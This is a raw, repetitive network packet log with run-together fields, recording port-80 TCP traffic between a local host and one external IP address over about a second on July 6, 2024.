                                                              Jul 6, 2024 04:22:02.847361088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847372055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847378969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847393990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847410917 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847824097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847834110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847842932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847857952 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847867012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847877979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847883940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847893000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847904921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847910881 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847920895 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847932100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.847939014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847954035 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.847980022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848372936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848390102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848401070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848411083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848422050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848432064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848442078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848452091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848463058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848473072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848495007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848501921 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848511934 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848521948 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848532915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848540068 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848550081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848558903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848567009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848573923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848583937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848594904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848602057 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848611116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.848629951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.848647118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.849201918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.849214077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.849240065 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.849251032 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934016943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934082985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934123993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934134960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934144974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934156895 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934163094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934175014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934182882 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934195042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934206963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934216976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934230089 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934252024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934262991 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934298038 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934340954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934351921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934361935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934372902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934391022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934478998 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934488058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934498072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934506893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934514046 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934537888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934604883 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934613943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934643030 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934653997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934664011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934683084 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934708118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934869051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934905052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.934988976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.934999943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935009956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935019970 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935028076 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935034990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935044050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935050964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935060024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935066938 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935077906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935082912 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935094118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935103893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935111046 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935122013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935137033 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935153961 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935288906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935300112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935323000 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935333014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935353041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935363054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935372114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935384035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935390949 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935410023 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935560942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935570955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935580015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935590029 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935595989 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935606003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935612917 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935621023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935636997 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935661077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935770988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935781002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935791969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935807943 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935830116 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.935955048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935966015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935976028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935988903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.935992956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936002970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936009884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936018944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936029911 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936036110 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936045885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936053038 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936063051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936074018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936378956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936388969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936399937 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936405897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936412096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936420918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936428070 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936438084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936444044 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936453104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936459064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936470032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936476946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936496973 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936503887 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936707020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936717033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936732054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936742067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936748981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936758995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936768055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936775923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936793089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936799049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936808109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936819077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936825991 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936834097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936841011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936850071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936860085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936867952 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936876059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936886072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936892986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936903000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936911106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936918974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936928988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.936935902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.936964035 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937530041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937546015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937556028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937567949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937572956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937582016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937593937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937601089 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937611103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937621117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937627077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937637091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937647104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937654018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937664032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937674999 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937680960 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937690973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937700987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937707901 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937717915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937724113 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937733889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937743902 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937751055 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937761068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937771082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937777996 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937787056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.937808037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.937818050 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938514948 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938530922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938540936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938551903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938559055 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938568115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938575029 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938584089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938594103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938601017 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938611031 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938620090 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938627005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938636065 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938644886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938653946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938662052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938671112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938678026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938687086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938697100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938707113 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938713074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938723087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938734055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938743114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938752890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938760042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938770056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938780069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938786030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938796043 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938802958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.938813925 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.938838005 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.939327955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.939338923 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.939349890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.939357042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.939373016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.939388990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024342060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024355888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024367094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024388075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024408102 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024429083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024444103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024455070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024461985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024471045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024488926 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024501085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024512053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024538040 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024719000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024729013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024739027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024748087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024756908 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024763107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024772882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024780989 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024791002 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024796009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024807930 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024813890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024823904 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024841070 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024954081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024964094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.024986029 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.024997950 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025013924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025023937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025033951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025046110 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025051117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025060892 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025069952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025087118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025114059 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025273085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025283098 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025296926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025304079 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025312901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025319099 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025332928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025337934 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025347948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025355101 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025362015 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025372028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025382996 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025403976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025516033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025548935 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025571108 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025605917 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025643110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025657892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025667906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025677919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025685072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025691986 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025707006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025723934 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025836945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025852919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025862932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025868893 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025878906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025886059 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025897026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025902033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025908947 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025918007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025932074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025942087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025949001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025958061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:03.025965929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:03.025995970 CEST4973080192.168.2.495.169.205.186
